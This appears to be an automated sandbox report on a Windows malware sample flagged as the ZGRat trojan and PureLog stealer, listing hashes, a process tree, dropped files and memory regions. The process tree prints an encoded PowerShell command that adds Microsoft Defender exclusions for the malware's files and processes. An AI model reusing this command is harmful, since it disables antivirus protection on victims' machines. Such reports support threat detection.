Analysis

  • max time kernel
    101s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    17-03-2024 08:12

General

  • Target

    002f6f310a1ea664bfe07e5dd7045676.exe

  • Size

    5.6MB

  • MD5

    002f6f310a1ea664bfe07e5dd7045676

  • SHA1

    104e60ea49811a2b33442c5192b0d5f539fd235e

  • SHA256

    c875d48e9242fff77283972803a88ca27a9045381a42c57c94f105cee7e0549c

  • SHA512

    3caad6aaa12f9dc5e5e7ddbbebe166b90e5721233619c8f31ad02754b0060889cb6cc36688b1b725e526e8c5e263b40ebb943c9bcf8938a56ce69c122076cb85

  • SSDEEP

    98304:V2wSiJSTjLc3oYusZhfoFH/Ydc4ajxG/zSDZyqBJEJaO6JrRe7kEcEAL:gw1gT84Y1ha/YdAftyziJrRnE

Malware Config

Signatures

  • Detect ZGRat V1 35 IoCs
  • PureLog Stealer

    PureLog Stealer is an infostealer written in C#.

  • PureLog Stealer payload 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\002f6f310a1ea664bfe07e5dd7045676.exe
    "C:\Users\Admin\AppData\Local\Temp\002f6f310a1ea664bfe07e5dd7045676.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2156
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMAAwADIAZgA2AGYAMwAxADAAYQAxAGUAYQA2ADYANABiAGYAZQAwADcAZQA1AGQAZAA3ADAANAA1ADYANwA2AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIAAwADAAMgBmADYAZgAzADEAMABhADEAZQBhADYANgA0AGIAZgBlADAANwBlADUAZABkADcAMAA0ADUANgA3ADYALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAbABhAHMAeAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAASQBsAGEAcwB4AC4AZQB4AGUA
      2⤵
        PID:2292
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACcAaAB0AHQAcABzADoALwAvAGcAbwBvAGcAbABlAC4AYwBvAG0AJwA=
        2⤵
          PID:1800
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" https://google.com/
            3⤵
              PID:1272
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1272 CREDAT:275457 /prefetch:2
                4⤵
                  PID:2836
            • C:\Users\Admin\AppData\Local\Temp\Geynnlzh.exe
              "C:\Users\Admin\AppData\Local\Temp\Geynnlzh.exe"
              2⤵
                PID:1628
              • C:\Users\Admin\AppData\Local\Temp\002f6f310a1ea664bfe07e5dd7045676.exe
                C:\Users\Admin\AppData\Local\Temp\002f6f310a1ea664bfe07e5dd7045676.exe
                2⤵
                  PID:812
                • C:\Users\Admin\AppData\Local\Temp\002f6f310a1ea664bfe07e5dd7045676.exe
                  C:\Users\Admin\AppData\Local\Temp\002f6f310a1ea664bfe07e5dd7045676.exe
                  2⤵
                    PID:1912

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                  Filesize

                  67KB

                  MD5

                  753df6889fd7410a2e9fe333da83a429

                  SHA1

                  3c425f16e8267186061dd48ac1c77c122962456e

                  SHA256

                  b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

                  SHA512

                  9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  344B

                  MD5

                  15af83e8c1ff15b667743737c96ee619

                  SHA1

                  60b05919b43774c97a347c55be4c02d6e05e05de

                  SHA256

                  f2c58b76f9ffba03aa8082e301fc3b6398ca24546010c01759f9a10067c41af3

                  SHA512

                  cd96306c784931d9219a9c8342036e84877d852cd474f4c0acf2d6c3d9c3e8135ce31205a4eb1dc4b916e6374cd5a2ed2aeb0f08a213b322f509b46132ca32a6

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  344B

                  MD5

                  dd16e24ece18b7769691b26162e0dc09

                  SHA1

                  f696a251d6197e91c938d965cfe1c483d7e839f4

                  SHA256

                  54b6a419cda5ed800582b793fcf2db88a444797aeb3e3ce07967c297f370d69c

                  SHA512

                  b5ec53006eabf1c4c81d3162d4503fc19a5fd58caec1d6c5bb12382608cdd8383559f85f13fbbf11451a160804f9279ab971b8b110b96eae2724eed7c0ffcb9e

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  344B

                  MD5

                  90c7bd4c4531b48cd6c7b43854d138a8

                  SHA1

                  d29b8439db2c050707eeff968c1cf91203f457ce

                  SHA256

                  e5e796bef7338f80eadf247f9db8fe4f90b89e7e838dd739d3488a53fdb8652d

                  SHA512

                  ca7bfa8517791735ac676faf5e36e611184ac2a408fdb80f04d6d15e96317b7ff937254632b0ff231155b7b6ec3efff3e83a48f37e930a4d6b4d9e4a6f2011d5

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  344B

                  MD5

                  defb7ad4eccc1fd2db9dd992f39f826f

                  SHA1

                  4fe0cbebf7f339fef2354ad82038bc0282b56e69

                  SHA256

                  68c434a711650576015ffc09b4b99489611859188720498f98e8fc39796e00f6

                  SHA512

                  cc436e67c151da7d5774f09fa977042ee41ae9cf969c6438464bf806d7d75295d4eb780adfb21d7d2cf0773d5d7547bcb773941116d0a9ef163f2fbf5b43219a

                • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\9H7WZPTF\www.google[1].xml

                  Filesize

                  98B

                  MD5

                  e9d00661c4a0d30df6b3295573141d07

                  SHA1

                  85cd184a5e7b8765faeec2dc0d5c7943d802ffe6

                  SHA256

                  be5939d661a664d4bebe670b8df6c4ba2223c373443e0764d4572b7e487ad4ce

                  SHA512

                  08247f4abb18ea330f65c801319e7692122b7e69d0b5666d569feddceb298eff84447be2fe93901963fe2f6f14d580f76084559485ee00bcb483b521ef10410e

                • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\92bocja\imagestore.dat

                  Filesize

                  5KB

                  MD5

                  241f5b0c947717d7f3668db16c65c243

                  SHA1

                  e1e835f739335d91297edde443fa74fa2fb2a4a4

                  SHA256

                  805bda216960e0b5da47645f8e9da2fe94eabab14080a33a063e998f5e455229

                  SHA512

                  f35c8fa7c88a41fb5f568bec44e64063955893426cbdde923953945229f008c3dce7be0924093aa4c654c8343adc591e83074f790edd7671347439b71292fe6b

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\673IEUYT\styles__ltr[1].css

                  Filesize

                  55KB

                  MD5

                  eb4bc511f79f7a1573b45f5775b3a99b

                  SHA1

                  d910fb51ad7316aa54f055079374574698e74b35

                  SHA256

                  7859a62e04b0acb06516eb12454de6673883ecfaeaed6c254659bca7cd59c050

                  SHA512

                  ec9bdf1c91b6262b183fd23f640eac22016d1f42db631380676ed34b962e01badda91f9cbdfa189b42fe3182a992f1b95a7353af41e41b2d6e1dab17e87637a0

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\recaptcha__en[1].js

                  Filesize

                  501KB

                  MD5

                  5a8547555d71e5846135a48dcc7ec3dc

                  SHA1

                  bdf99d0037d631ca1d24efa343781f55a11afb05

                  SHA256

                  7a01932abc324cbdf143534bd8dc0e665e045a2ae8a0d234d24f2d3ad9ebc619

                  SHA512

                  863d425b41d6b439618ccd38d5ea46d5ad6cf3c145a476e0a8596903cfaac4a2d04d40f5cd4f92ac74bdd73dfaaec9f4661c6a71116dfc78b6a41f7d3bd801e6

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IFGNZ1XG\favicon[2].ico

                  Filesize

                  5KB

                  MD5

                  f3418a443e7d841097c714d69ec4bcb8

                  SHA1

                  49263695f6b0cdd72f45cf1b775e660fdc36c606

                  SHA256

                  6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

                  SHA512

                  82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

                • C:\Users\Admin\AppData\Local\Temp\Cab2ECF.tmp

                  Filesize

                  65KB

                  MD5

                  ac05d27423a85adc1622c714f2cb6184

                  SHA1

                  b0fe2b1abddb97837ea0195be70ab2ff14d43198

                  SHA256

                  c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                  SHA512

                  6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

                • C:\Users\Admin\AppData\Local\Temp\Geynnlzh.exe

                  Filesize

                  1.4MB

                  MD5

                  6ef52aff6b078e83398237aef75ba64f

                  SHA1

                  1038ff8b5bb89f8c115342c751d1016d453a844a

                  SHA256

                  8390179d35422eb4f1c5e3799e2bf6f2f817b703bf5106cf431435d393664177

                  SHA512

                  656f2db7f93b0e9156c9ea0b668ba6c88ea2efd1d4f2a900eea977d195a4d9711bb635972ca220758ae27f0535a0bc6b7272e06e8b88b78c8492b81960ed36b6

                • C:\Users\Admin\AppData\Local\Temp\Geynnlzh.exe

                  Filesize

                  2.5MB

                  MD5

                  e61fd850ef377d0b0cee33c5014d1bb2

                  SHA1

                  0a612adb064f5e0d8f17eaf87885e7bfbfbff90d

                  SHA256

                  52dd9c5e85d9920d971b9a65860fc9f09acd99e48effeeb728cc5ad3be46acf6

                  SHA512

                  7df846f43a784a80be9bdf965f49c17c57987b3bb28b5647173a99775d810c2d8042464451427f1649330d0efc1a2bcb542474c6e6e2579be7d8368f9fe42c75

                • C:\Users\Admin\AppData\Local\Temp\Tar2F00.tmp

                  Filesize

                  171KB

                  MD5

                  9c0c641c06238516f27941aa1166d427

                  SHA1

                  64cd549fb8cf014fcd9312aa7a5b023847b6c977

                  SHA256

                  4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

                  SHA512

                  936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

                • C:\Users\Admin\AppData\Local\Temp\Tar4564.tmp

                  Filesize

                  175KB

                  MD5

                  dd73cead4b93366cf3465c8cd32e2796

                  SHA1

                  74546226dfe9ceb8184651e920d1dbfb432b314e

                  SHA256

                  a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

                  SHA512

                  ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  60397c7ff9ff3c4a68d294b36facbfcd

                  SHA1

                  4b59f76dfa014634c77fa166c38a20d206c49ea2

                  SHA256

                  a21132c54fc1435810fe282b7e6cd2cb03665af5cbf966467108bce81f0baa9e

                  SHA512

                  a2044dc771f236c40976b013b9db8ccfb8714d4585600043af5113aa0ecefaf2bccd093a390603ad4c0df42ed53ac0662e0a0f6531234f4585feb6e8866b9957

                • \Users\Admin\AppData\Local\Temp\Geynnlzh.exe

                  Filesize

                  1.6MB

                  MD5

                  5acb17c7f730d4b0edbed092086de163

                  SHA1

                  d8de30e4b5213c25eb109fee7c1427d386968cd6

                  SHA256

                  d9cb847d9a48bb6fbe85f4e0657ff1ece5bdbcac9f43e47efc317ecefa375899

                  SHA512

                  96f84cd6a72aac4fbbf6cddd063ac3e7b2c6f831e0bbb50b5e6417fc629db75a8083d208f2a1fcbb15666751d13f6ab3585b98c5168de4a04748e292b588b7c8

                • memory/1628-6653-0x00000000747A0000-0x0000000074E8E000-memory.dmp

                  Filesize

                  6.9MB

                • memory/1628-4802-0x00000000747A0000-0x0000000074E8E000-memory.dmp

                  Filesize

                  6.9MB

                • memory/1628-4801-0x0000000000060000-0x00000000002EC000-memory.dmp

                  Filesize

                  2.5MB

                • memory/1628-4804-0x0000000004F80000-0x00000000051AA000-memory.dmp

                  Filesize

                  2.2MB

                • memory/1628-4805-0x00000000051B0000-0x00000000053D8000-memory.dmp

                  Filesize

                  2.2MB

                • memory/1628-4821-0x0000000000960000-0x00000000009A0000-memory.dmp

                  Filesize

                  256KB

                • memory/1628-4808-0x00000000053E0000-0x0000000005606000-memory.dmp

                  Filesize

                  2.1MB

                • memory/1800-4810-0x000000006F060000-0x000000006F60B000-memory.dmp

                  Filesize

                  5.7MB

                • memory/1800-4813-0x0000000002CA0000-0x0000000002CE0000-memory.dmp

                  Filesize

                  256KB

                • memory/1800-4817-0x000000006F060000-0x000000006F60B000-memory.dmp

                  Filesize

                  5.7MB

                • memory/1800-4824-0x0000000002CA0000-0x0000000002CE0000-memory.dmp

                  Filesize

                  256KB

                • memory/1800-4831-0x0000000002CA0000-0x0000000002CE0000-memory.dmp

                  Filesize

                  256KB

                • memory/1800-4860-0x000000006F060000-0x000000006F60B000-memory.dmp

                  Filesize

                  5.7MB

                • memory/1912-4841-0x00000000747A0000-0x0000000074E8E000-memory.dmp

                  Filesize

                  6.9MB

                • memory/1912-4839-0x0000000000400000-0x00000000004D8000-memory.dmp

                  Filesize

                  864KB

                • memory/1912-4849-0x0000000004D60000-0x0000000004E76000-memory.dmp

                  Filesize

                  1.1MB

                • memory/1912-4848-0x0000000004C10000-0x0000000004C50000-memory.dmp

                  Filesize

                  256KB

                • memory/2156-4783-0x0000000000470000-0x0000000000471000-memory.dmp

                  Filesize

                  4KB

                • memory/2156-36-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-66-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-68-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-3442-0x00000000747A0000-0x0000000074E8E000-memory.dmp

                  Filesize

                  6.9MB

                • memory/2156-3849-0x0000000004F40000-0x0000000004F80000-memory.dmp

                  Filesize

                  256KB

                • memory/2156-0-0x0000000000C00000-0x000000000119C000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2156-4784-0x0000000007700000-0x0000000007A52000-memory.dmp

                  Filesize

                  3.3MB

                • memory/2156-4785-0x0000000000570000-0x00000000005BC000-memory.dmp

                  Filesize

                  304KB

                • memory/2156-62-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-60-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-58-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-56-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-54-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-52-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-1-0x00000000747A0000-0x0000000074E8E000-memory.dmp

                  Filesize

                  6.9MB

                • memory/2156-50-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-48-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-2-0x0000000004F40000-0x0000000004F80000-memory.dmp

                  Filesize

                  256KB

                • memory/2156-46-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-44-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-42-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-40-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-3-0x0000000005390000-0x000000000589E000-memory.dmp

                  Filesize

                  5.1MB

                • memory/2156-38-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-64-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-4-0x00000000068A0000-0x0000000006DAA000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-4830-0x00000000747A0000-0x0000000074E8E000-memory.dmp

                  Filesize

                  6.9MB

                • memory/2156-34-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-32-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-30-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-28-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-26-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-24-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-5-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-22-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-20-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-18-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-16-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-14-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-12-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-10-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-8-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2156-6-0x00000000068A0000-0x0000000006DA5000-memory.dmp

                  Filesize

                  5.0MB

                • memory/2292-4866-0x000000006F060000-0x000000006F60B000-memory.dmp

                  Filesize

                  5.7MB

                • memory/2292-4829-0x000000006F060000-0x000000006F60B000-memory.dmp

                  Filesize

                  5.7MB

                • memory/2292-4819-0x00000000028A0000-0x00000000028E0000-memory.dmp

                  Filesize

                  256KB

                • memory/2292-4809-0x000000006F060000-0x000000006F60B000-memory.dmp

                  Filesize

                  5.7MB

                • memory/2292-4803-0x00000000028A0000-0x00000000028E0000-memory.dmp

                  Filesize

                  256KB